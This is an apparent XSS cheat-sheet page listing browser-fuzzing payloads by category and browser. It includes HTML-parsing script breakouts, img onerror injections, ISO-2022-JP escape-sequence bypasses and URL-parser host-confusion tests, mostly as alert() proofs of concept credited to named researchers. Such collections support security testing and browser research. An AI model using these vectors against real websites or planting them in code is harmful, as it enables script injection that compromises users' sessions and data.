Cheat Sheet
Generated payloads from fuzz test results. Filter by type, category, or browser.
Found 169 vectors with results
<div id="test" style="background-image: url(⟦00⟧;width:100%">hello</div>XSSURL HandlingChrome
if (new URL('https://www.example.com/0x00evil.com').host=='evil.com') {0x0D
alert('"https://www.example.com/0x00evil.com" -> "evil.com"')0x0D
}0x0D
0x0D
if (new URL('https://www.example.com0x00evil.com').host=='evil.com') {0x0D
alert('"https://www.example.com0x00evil.com" -> "evil.com"')0x0D
}JSURL HandlingChrome
<script>0x0D
x = "<!--<script>>"0x0D
</script>0x0D
<div title="</script><img src=data: onerror=alert(62)>"></div>Author: hackvertor
XSSHTML ParsingChromeFirefoxMicrosoft Edge
<script>0x0D
x = "<!--<script0x0C>"0x0D
</script>0x0D
<div title="</script><img src=data: onerror=alert(12)>"></div>Author: hackvertor
XSSHTML ParsingChromeFirefoxMicrosoft Edge
<script>0x0D
x = "<!--<script >"0x0D
</script>0x0D
<div title="</script><img src=data: onerror=alert(32)>"></div>Author: hackvertor
XSSHTML ParsingChromeFirefoxMicrosoft Edge
<script>0x0D
x = "<!--<script0x0D>"0x0D
</script>0x0D
<div title="</script><img src=data: onerror=alert(13)>"></div>Author: hackvertor
XSSHTML ParsingChromeFirefoxMicrosoft Edge
<script>0x0D
x = "<!--<script/>"0x0D
</script>0x0D
<div title="</script><img src=data: onerror=alert(47)>"></div>Author: hackvertor
XSSHTML ParsingChromeFirefoxMicrosoft Edge
let img = document.createElement('img');0x0D
img.src = 'data:';0x0D
img.setAttribute('\onerror','alert(92)')0x0D
document.body.append(img);JSDOM BehaviorChromeFirefoxSafari
s = "abc";0x0D
keys = insertPayload("__proto__", fromCodePoint(0))0x0D
0x0D
for(i = 0; i < keys.length; i++) {0x0D
if (typeof s[keys[i]] != "undefined") {0x0D
alert(keys[i]);0x0D
break;0x0D
}0x0D
}Author: vitorfhc
JSXSS ExecutionChrome
new URL("https://x.se/long/..0x09/a").pathname.length > 4 ? false : alert(9)Author: joaxcar
JSURL HandlingChromeFirefoxSafari
new URL("https://x.se/long/..#/a").pathname.length > 4 ? false : alert(35)Author: joaxcar
JSURL HandlingChromeFirefoxSafari
new URL("https://x.se/long/..//a").pathname.length > 4 ? false : alert(47)Author: joaxcar
JSURL HandlingChromeFirefoxSafari
new URL("https://x.se/long/..?/a").pathname.length > 4 ? false : alert(63)Author: joaxcar
JSURL HandlingChromeFirefoxSafari
new URL("https://x.se/long/..\/a").pathname.length > 4 ? false : alert(92)Author: joaxcar
JSURL HandlingChromeFirefoxSafari
b1 = Math.floor(i / 256);0x0D
b2 = i % 256;0x0D
c = d.decode(new Uint8Array([0x1b, 0x24, 0x40, b1, b2])) 0x0D
if (c.split("").map((c) => c.charCodeAt(0)).some((i) => i < 127)) alert(i)Author: JorianWoltjer
JSCharacter EncodingChrome
<a href="https://0x00.example.com/" id="test0"></a>Source: Chars allowed before domain
Author: t0xodile
XSSURL HandlingChrome
<img src=>{"[alert]"}<img/src/onerror=alert(1)>Source: work
Author: nu11secur1ty
HTMLHTML ParsingChrome
let chr = String.fromCodePoint(33);0x0D
escape(chr) !== encodeURIComponent(chr) && alert(33)Author: hackvertor
JSXSS ExecutionChromeFirefoxSafari
let chr = String.fromCodePoint(43);0x0D
escape(chr) !== encodeURIComponent(chr) && alert(43)Author: hackvertor
JSXSS ExecutionChromeFirefoxSafari
let chr = String.fromCodePoint(47);0x0D
escape(chr) !== encodeURIComponent(chr) && alert(47)Author: hackvertor
JSXSS ExecutionChromeFirefoxSafari
let chr = String.fromCodePoint(64);0x0D
escape(chr) !== encodeURIComponent(chr) && alert(64)Author: hackvertor
JSXSS ExecutionChromeFirefoxSafari
<script>"\\"-alert(92)//"</script>XSSCharacter EncodingChromeFirefoxSafari
try {0x0D
standard_chars = [0x0D
`"`, `'`, `,`, `\n`, `\t`, `\r`, `}`, `{`, `\\`0x0D
];0x0D
0x0D
if (!standard_chars.includes(String.fromCodePoint(0))) { 0x0D
JSON.parse(`{"test":"0x00"}`);0x0D
}0x0D
} catch {0x0D
alert(0);0x0D
}0x0D
Author: DreyAnd
JSXSS ExecutionChromeSafari
try {0x0D
standard_chars = [0x0D
`"`, `'`, `,`, `\n`, `\t`, `\r`, `}`, `{`, `\\`0x0D
];0x0D
0x0D
if (!standard_chars.includes(String.fromCodePoint(1))) { 0x0D
JSON.parse(`{"test":"0x01"}`);0x0D
}0x0D
} catch {0x0D
alert(1);0x0D
}0x0D
Author: DreyAnd
JSXSS ExecutionChromeSafari
try {0x0D
standard_chars = [0x0D
`"`, `'`, `,`, `\n`, `\t`, `\r`, `}`, `{`, `\\`0x0D
];0x0D
0x0D
if (!standard_chars.includes(String.fromCodePoint(2))) { 0x0D
JSON.parse(`{"test":"0x02"}`);0x0D
}0x0D
} catch {0x0D
alert(2);0x0D
}0x0D
Author: DreyAnd
JSXSS ExecutionChromeSafari
try {0x0D
standard_chars = [0x0D
`"`, `'`, `,`, `\n`, `\t`, `\r`, `}`, `{`, `\\`0x0D
];0x0D
0x0D
if (!standard_chars.includes(String.fromCodePoint(3))) { 0x0D
JSON.parse(`{"test":"0x03"}`);0x0D
}0x0D
} catch {0x0D
alert(3);0x0D
}0x0D
Author: DreyAnd
JSXSS ExecutionChromeSafari
try {0x0D
standard_chars = [0x0D
`"`, `'`, `,`, `\n`, `\t`, `\r`, `}`, `{`, `\\`0x0D
];0x0D
0x0D
if (!standard_chars.includes(String.fromCodePoint(4))) { 0x0D
JSON.parse(`{"test":"0x04"}`);0x0D
}0x0D
} catch {0x0D
alert(4);0x0D
}0x0D
Author: DreyAnd
JSXSS ExecutionChromeSafari
let transformedChr = String.fromCodePoint(0).toUpperCase();0x0D
0 > 0x7f &&0x0D
/^\w+$/.test(transformedChr) &&0x0D
alert(0 + '=>' + transformedChr)Author: hackvertor
JSXSS ExecutionSafariFirefoxChrome
<a id="0x1B$@"></a>0x1B(B<a id="><img src=x onerror=alert(64)></a>Author: Cillian-Collins
XSSHTML ParsingChrome
<a id="0x1B$B"></a>0x1B(B<a id="><img src=x onerror=alert(66)></a>Author: Cillian-Collins
XSSHTML ParsingChrome
let transformedChr = String.fromCodePoint(0).toLowerCase();0x0D
0 > 0x7f &&0x0D
/^\w+$/.test(transformedChr) &&0x0D
alert(0 + '=>' + transformedChr)Author: hackvertor
JSXSS ExecutionSafariFirefoxChrome
<0x1B(<img src onerror=alert(60)>Author: hackvertor
XSSCharacter EncodingChromeFirefoxSafariMicrosoft Edge
<0x1B(Bimg src onerror=alert(66)>Author: hackvertor
XSSCharacter EncodingChromeFirefoxSafariMicrosoft Edge
<a id="0x1B$B"></a>0x1B(B<a id="><img src=x onerror=alert(66)></a>Author: Cillian-Collins
XSSHTML ParsingChrome
<a id="0x1B$B"></a>0x1B(J<a id="><img src=x onerror=alert(74)></a>Author: Cillian-Collins
XSSHTML ParsingChrome